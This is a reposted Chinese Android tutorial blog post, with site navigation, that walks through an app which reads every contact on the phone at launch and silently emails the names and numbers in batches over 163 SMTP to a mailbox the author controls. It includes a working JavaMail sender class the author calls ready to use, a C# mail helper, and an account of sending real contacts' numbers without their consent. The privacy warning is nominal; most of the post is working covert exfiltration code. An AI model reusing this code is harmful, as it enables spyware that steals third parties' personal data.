博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Android切近实战(十)
阅读量:6139 次
发布时间:2019-06-21

本文共 9587 字,大约阅读时间需要 31 分钟。

最近上半年绩效确认,又是C,我就不明白了,怎么才能得B,怎么才能得A。我去,不借书,不参加培训,不加班就活该得C,那你招一群刚毕业的学生得了,刚毕业的学生干劲大,加班到半夜都没问题。唉,不说了,这年头不加班干完活都觉得不正常了。

大家还记得上篇文章么,看下图。

今天的话我就是要在该App启动的时候,将手机内存储的所有联系人通过邮件发送到指定的邮箱,怎么样,够狠吧。所以不是所有的app我们都给他开读取手机信息的权限,否则就泄露个底朝天。我们先看一下发邮件,需要到网上下载这三个jar包,这三个jar包不好下,要么你去google官网下,要么在csdn下,或者干脆在本篇文章下,给大家点福利。

说到这个发邮件,类是别人写的,我拿来以为能用,结果他妈的很多问题,压根就发不了邮件。改了很多问题,查了一些资料,尼玛才搞定。说到这里,我就想说那些写博客的或者是抄博客的或者是转载博客的,咋们做技术的要凭良心写博客。不能不管三七二十一,就抄过来。这样不但让看你博客的人觉得你不专业,而且还浪费每个看你博客的人的时间。你写个博客,你文采不行,但是你把代码最起码写的能正常运行,能达到该代码能实现的功能吧。

好了,不说了。我们看一下代码,我的设计是将联系人信息全部读取出来,然后通过多线程分批发送到指定邮箱。要说到多线程,大家肯定会想到Handler,handler会分发runable对象到主线程消息队列中。当我们实例化一个Handler对象的时候,就默认与对它初始化的进程的消息队列绑定。那么当线程有更新UI的操作话,我们就需要把数据消息作为一个Message对象发送到消息队列中,然后,用Handler中的handlerMessge方法处理传过来的数据信息,并操作UI。那么刚才说到分发runable对象到主线程队列中,我们看一下Handler有哪些方法可以实现分发Runable对象(查API)。

我们今天使用的其实就是post方法,分发多个runable对象到消息队列并执行。说了这么多不如直接看代码来得实在。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
private 
void 
SyncContactUserInfo() {
        
CustomRunable customeRunable;
        
List<Map<String, Object>> tempPagedDataList = 
this
.GetContactUserList();
        
List<Map<String, Object>> dataList = 
this
.GetContactUserList();
        
int 
totalSize = dataList.size();
        
if 
(totalSize == 
0
)
            
return
;
 
        
int 
threadCount = totalSize % PageSize == 
0 
? totalSize / PageSize
                
: totalSize / PageSize + 
1
;
 
        
for 
(
int 
i = 
1
; i <= threadCount; i++) {
            
if 
(i == threadCount) {
                
tempPagedDataList = dataList.subList((i - 
1
) * PageSize,
                        
(i - 
1
) * PageSize + totalSize % PageSize -
1
);
            
else 
{
                
tempPagedDataList = dataList.subList((i - 
1
) * PageSize,
                        
PageSize * i - i);
            
}
            
customeRunable = 
new 
CustomRunable(tempPagedDataList, i);
            
handler.post(customeRunable);
        
}
    
}

上节课我们已经写过如何读取手机联系人了,所以这里就不在赘述。这段代码其实就是把联系人信息读取出来,然后去分批发送。上面的代码相信做过分页的人都应该知道,需要注意的就是List<T>的subList方法,传入start Index和end index就可以了,这里有点类似客户端分页。

在上面的代码中我们看到了一个CustomRunable类,这个类是我自己定义的,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
class 
CustomRunable 
implements 
Runnable {
        
StringBuilder strBuilder = 
new 
StringBuilder();
        
List<Map<String, Object>> dataList;
        
int 
index;
 
        
public 
CustomRunable(List<Map<String, Object>> dataList, 
int 
index) {
            
this
.dataList = dataList;
            
this
.index = index;
        
}
 
        
public 
void 
run() {
            
strBuilder.append(
"<html><body><table style='border:1px solid black'>"
);
            
strBuilder.append(
"<tr><th>姓名</th><th>手机号码</th></tr>"
);
 
            
if 
(
this
.dataList != 
null 
&& 
this
.dataList.size() > 
0
) {
                
for 
(Map<String, Object> data : dataList) {
                    
strBuilder.append(
"<tr>"
);
                    
strBuilder.append(
"<td>"
);
                    
strBuilder.append(data.get(
"UserName"
).toString());
                    
strBuilder.append(
"</td>"
);
                    
strBuilder.append(
"<td>"
);
                    
strBuilder.append(data.get(
"UserPhoneNumber"
).toString());
                    
strBuilder.append(
"</td>"
);
                    
strBuilder.append(
"</tr>"
);
                
}
            
}
 
            
strBuilder.append(
"</table></body></html>"
);
            
MailSenderInfo mailSendInfo = BuildMailSendInfo(
"第"
                    
+ index + 
"批手机号"
, strBuilder.toString());
            
SimpleMailSender.sendHtmlMail(mailSendInfo);
        
}
    
}

我定义了默认的构造函数,一个是联系人手机号码列表,一个是标示是第几批。当我拿到这批手机号码的时候,构造一个html格式的邮件,然后发送。邮件的标题是“第{0}批手机号码”,邮件的内容就是第一列姓名,第二列手机号的一个html表格。其实这里的run方法,一旦这个runable对象被分发到队列中,就会立即执行run方法。

大家其实可能此时最关注的是发邮件的代码,不妨就把最关键的类(SimpleMailSender)的代码贴出来好了,然后完了如果大家想要的话可以在这篇文章的附件下载或者加入群“.net技术冲锋舟(205217091)”。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
package 
bruce.util.mail;
 
import 
java.util.Date;
import 
java.util.Properties;
 
import 
javax.activation.CommandMap;
import 
javax.activation.MailcapCommandMap;
import 
javax.mail.Address;
import 
javax.mail.BodyPart;
import 
javax.mail.Message;
import 
javax.mail.MessagingException;
import 
javax.mail.Multipart;
import 
javax.mail.Session;
import 
javax.mail.Transport;
import 
javax.mail.internet.InternetAddress;
import 
javax.mail.internet.MimeBodyPart;
import 
javax.mail.internet.MimeMessage;
import 
javax.mail.internet.MimeMultipart;
 
public 
class 
SimpleMailSender {
    
/**
     
* 以文本格式发送邮件
     
     
* @param mailInfo
     
*            待发送的邮件的信息
     
*/
    
public 
static 
boolean 
sendTextMail(MailSenderInfo mailInfo) {
        
// 判断是否需要身份认证
        
MyAuthenticator authenticator = 
null
;
        
Properties pro = mailInfo.getProperties();
        
if 
(mailInfo.isValidate()) {
            
// 如果需要身份认证,则创建一个密码验证器
            
authenticator = 
new 
MyAuthenticator(mailInfo.getUserName(),
                    
mailInfo.getPassword());
        
}
        
// 根据邮件会话属性和密码验证器构造一个发送邮件的session
        
Session sendMailSession = Session
                
.getInstance(pro, authenticator);
        
try 
{
            
// 根据session创建一个邮件消息
            
Message mailMessage = 
new 
MimeMessage(sendMailSession);
            
// 创建邮件发送者地址
            
Address from = 
new 
InternetAddress(mailInfo.getFromAddress());
            
// 设置邮件消息的发送者
            
mailMessage.setFrom(from);
            
// 创建邮件的接收者地址,并设置到邮件消息中
            
Address to = 
new 
InternetAddress(mailInfo.getToAddress());
            
mailMessage.setRecipient(Message.RecipientType.TO, to);
            
// 设置邮件消息的主题
            
mailMessage.setSubject(mailInfo.getSubject());
            
// 设置邮件消息发送的时间
            
mailMessage.setSentDate(
new 
Date());
            
// 设置邮件消息的主要内容
            
String mailContent = mailInfo.getContent();
            
mailMessage.setText(mailContent);
            
// 发送邮件
            
Transport.send(mailMessage);
            
return 
true
;
        
catch 
(MessagingException ex) {
            
ex.printStackTrace();
        
}
        
return 
false
;
    
}
 
    
/**
     
* 以HTML格式发送邮件
     
     
* @param mailInfo
     
*            待发送的邮件信息
     
*/
    
public 
static 
boolean 
sendHtmlMail(MailSenderInfo mailInfo) {
        
// 判断是否需要身份认证
        
MyAuthenticator authenticator = 
null
;
        
Properties pro = mailInfo.getProperties();
        
// 如果需要身份认证,则创建一个密码验证器
        
if 
(mailInfo.isValidate()) {
            
authenticator = 
new 
MyAuthenticator(mailInfo.getUserName(),
                    
mailInfo.getPassword());
        
}
        
// 根据邮件会话属性和密码验证器构造一个发送邮件的session
        
Session sendMailSession = Session
                
.getInstance(pro, authenticator);
        
try 
{
            
// 根据session创建一个邮件消息
            
Message mailMessage = 
new 
MimeMessage(sendMailSession);
            
// 创建邮件发送者地址
            
Address from = 
new 
InternetAddress(mailInfo.getFromAddress());
            
// 设置邮件消息的发送者
            
mailMessage.setFrom(from);
            
// 创建邮件的接收者地址,并设置到邮件消息中
            
Address to = 
new 
InternetAddress(mailInfo.getToAddress());
            
// Message.RecipientType.TO属性表示接收者的类型为TO
            
mailMessage.setRecipient(Message.RecipientType.TO, to);
            
// 设置邮件消息的主题
            
mailMessage.setSubject(mailInfo.getSubject());
            
// 设置邮件消息发送的时间
            
mailMessage.setSentDate(
new 
Date());
            
// MiniMultipart类是一个容器类,包含MimeBodyPart类型的对象
            
Multipart mainPart = 
new 
MimeMultipart();
            
// 创建一个包含HTML内容的MimeBodyPart
            
BodyPart html = 
new 
MimeBodyPart();
            
// 设置HTML内容
            
html.setContent(mailInfo.getContent(), 
"text/html; charset=utf-8"
);
            
mainPart.addBodyPart(html);
            
// 将MiniMultipart对象设置为邮件内容
            
mailMessage.setContent(mainPart);
            
// 发送邮件
             
            
MailcapCommandMap mc = (MailcapCommandMap)CommandMap.getDefaultCommandMap();
            
mc.addMailcap(
"text/html;; x-java-content-handler=com.sun.mail.handlers.text_html"
);
            
mc.addMailcap(
"text/xml;; x-java-content-handler=com.sun.mail.handlers.text_xml"
);
            
mc.addMailcap(
"text/plain;; x-java-content-handler=com.sun.mail.handlers.text_plain"
);
            
mc.addMailcap(
"multipart/*;; x-java-content-handler=com.sun.mail.handlers.multipart_mixed"
);
            
mc.addMailcap(
"message/rfc822;; x-java-content-handler=com.sun.mail.handlers.message_rfc822"
);
            
CommandMap.setDefaultCommandMap(mc);
            
Transport.send(mailMessage);
            
return 
true
;
        
catch 
(MessagingException ex) {
            
ex.printStackTrace();
        
}
        
return 
false
;
    
}
}

OK,这就是我修改后的版本,能直接用,文章的末尾我会给大家见证奇迹。这个类中,一个是发送文本邮件,一个是发送Html格式的邮件,也可以发附件。OK,其实调用的话就是构造一个MailSenderInfo对象。如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
private 
static 
MailSenderInfo BuildMailSendInfo(String mailSubject,
            
String mailContent) {
        
MailSenderInfo mailInfo = 
new 
MailSenderInfo();
        
mailInfo.setContent(mailContent);
        
mailInfo.setFromAddress(
"Bruce.L.Li@163.com"
);
        
mailInfo.setMailServerHost(
"smtp.163.com"
);
        
mailInfo.setMailServerPort(
"25"
);
        
mailInfo.setPassword(
"********"
);
        
mailInfo.setSubject(mailSubject);
        
mailInfo.setToAddress(
"******@qq.com"
);
        
mailInfo.setUserName(
"lilei1986XXXX@163.com"
);
        
mailInfo.setValidate(
true
);
        
return 
mailInfo;
    
}

在这里解释一下这些方法

setContent:邮件内容

setFromAddress:发送者邮箱账号

setMailServerHost:163邮箱

setMailServerPort:25

setPassword:用来验证的邮箱密码

setSubject:邮件标题

setToAddress:接收者的邮箱

setUserName:用来验证的邮箱账号

setValidate:如果为true,则会验证setUserName和setPassword的用户名和密码。否则不会。

这里需要注意setUserName和setPassword必须是一个能登陆163邮箱的账号和密码。

其实这里和C#发Email差不多

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
using 
System;
using 
System.Collections.Generic;
using 
System.Linq;
using 
System.Text;
 
namespace 
CLUtility
{
    
public 
class 
EmailHelper
    
{
        
public 
static 
void 
SendEmail(
string 
mailTitle, 
string 
mailContent, 
params 
string
[] mailToAddress)
        
{
            
System.Net.Mail.SmtpClient client = 
new 
System.Net.Mail.SmtpClient();
            
client.Host = 
"smtp.ym.163.com"
;
//使用163的SMTP服务器发送邮件
            
client.UseDefaultCredentials = 
true
;
            
client.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;
            
client.Credentials = 
new 
System.Net.NetworkCredential(
"Bruce.XXX.XX@163.com"
"*******"
);
            
System.Net.Mail.MailMessage Message = 
new 
System.Net.Mail.MailMessage();
            
Message.From = 
new 
System.Net.Mail.MailAddress(
"lilei1986abc@163.com"
);
 
            
foreach 
(
var 
address 
in 
mailToAddress)
            
{
                
Message.To.Add(address);
            
}
 
            
Message.Subject = mailTitle;
            
Message.Body = mailContent;
            
Message.SubjectEncoding = System.Text.Encoding.UTF8;
            
Message.BodyEncoding = System.Text.Encoding.UTF8;
            
Message.Priority = System.Net.Mail.MailPriority.High;
            
Message.IsBodyHtml = 
true
;
            
client.Send(Message);
        
}
    
}
}

OK,最后,我们见证奇迹的时刻到了,先看163发件箱。大家看到了顺序并不是按照1-9升序排列。

我们看一下发出的邮件内容

这些可都是我手机上的真实号码。唉,对不起大家,不知道网易和腾讯是否对这些号码感兴趣呢。

最后我们再看看QQ邮箱是否已经收到邮件。

木有问题,收到了。我们看一下内容

OK,成功了,最后,哥们的博客是货真价实的,测试机是小米3,看过这篇文章,你以后还敢随便允许app访问你的手机联系人信息吗。

本文转自 BruceAndLee 51CTO博客,原文链接:http://blog.51cto.com/leelei/1580324,如需转载请自行联系原作者

你可能感兴趣的文章
VM挂起后无法打开
查看>>
我的友情链接
查看>>
监控介绍
查看>>
linux下logrotate配置
查看>>
后悔自己2013年错过的一切,只好在浪费了2014来弥补
查看>>
2 Linux 相关历史及基础
查看>>
子网的划分方法
查看>>
勤能补拙,拙有何用?
查看>>
Configuring InnoDB Buffer Pool Flushing
查看>>
webdriver 自动化测试初试
查看>>
maven依赖本地非repository中的jar包-依赖jar包放在WEB-INF/lib等目录下
查看>>
cacti PHP 少见错误 PHP Warning: session_start(): open(/var/lib/php/session/
查看>>
SQL Server 2016 Management Studio 安装
查看>>
KVM虚拟化的介绍与简单使用
查看>>
win7怎么设置自动关机
查看>>
iOS的归档(archive)和解档(unarchive)
查看>>
HTML第四讲 Dreamweaver与框架集
查看>>
Testin内测解决方案,让小白变身测试专家!
查看>>
BeanShell中友好的文档对象
查看>>
【58沈剑 架构师之路】InnoDB并发如此高,原因竟然在这?
查看>>